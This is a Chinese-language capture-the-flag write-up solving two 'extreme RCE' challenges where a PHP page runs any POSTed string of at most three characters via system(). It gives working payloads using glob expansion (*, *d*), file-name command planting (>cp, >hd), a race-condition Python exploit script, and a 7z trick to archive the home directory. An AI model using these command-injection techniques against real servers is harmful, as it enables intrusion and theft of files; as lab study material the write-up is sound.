极限RCE之三字节RCE

极限命令执行6

<?php
error_reporting(0);
if (isset($_POST['ctf_show'])) {$ctfshow = $_POST['ctf_show'];if (is_string($ctfshow) && strlen($ctfshow) <= 3) {sleep(1);system($ctfshow);}
}else{highlight_file(__FILE__);
}
?>

限定字符长度，先简单的ls，发现有文件（flag.php index.php）
如何去看看有哪些两个字母的命令：

然后这里面hd是hexdump的缩写可以用来读取文件。然后呢我们要利用的还有一点就是*d*这个就是会匹配到当前文件下带d的字符，即 hd index.php从而读取index.php，所以只需将flag.php的内容覆盖到index.php。但是要条件竞争！

import requestsurl = "http://7b219e58-e304-4f4e-bcd3-d8eaf6cdd8cc.challenge.ctf.show/"requests.post(url, data={"ctf_show": ">cp"})
requests.post(url, data={"ctf_show": ">hd"})try:requests.post(url, data={"ctf_show": "*p"}, timeout=0.1)
except:passr = requests.post(url, data={"ctf_show": "*d*"})print(r.text)

极限命令执行7

<?php
error_reporting(0);#go back home , your flag is not here!if (isset($_POST['ctf_show'])) {$ctfshow = $_POST['ctf_show'];if (is_string($ctfshow) && strlen($ctfshow) <= 3) {system($ctfshow);}
}else{highlight_file(__FILE__);
}
?>

这里用到的命令就是7z（一个用于解压缩的命令）

7z a archive.7z file1 file2 dir1
a = add，表示创建压缩包
archive.7z = 生成的压缩文件名
file1 file2 dir1 = 要打包的文件和目录

~会自动展开为你的家目录的完整路径。
payload:

7z
a
b
* ~

然后下载b.7z压缩包即可！

小结

单独使用*表示将当前目录第一个文件名当作命令执行，其余文件名当作这个命令的参数！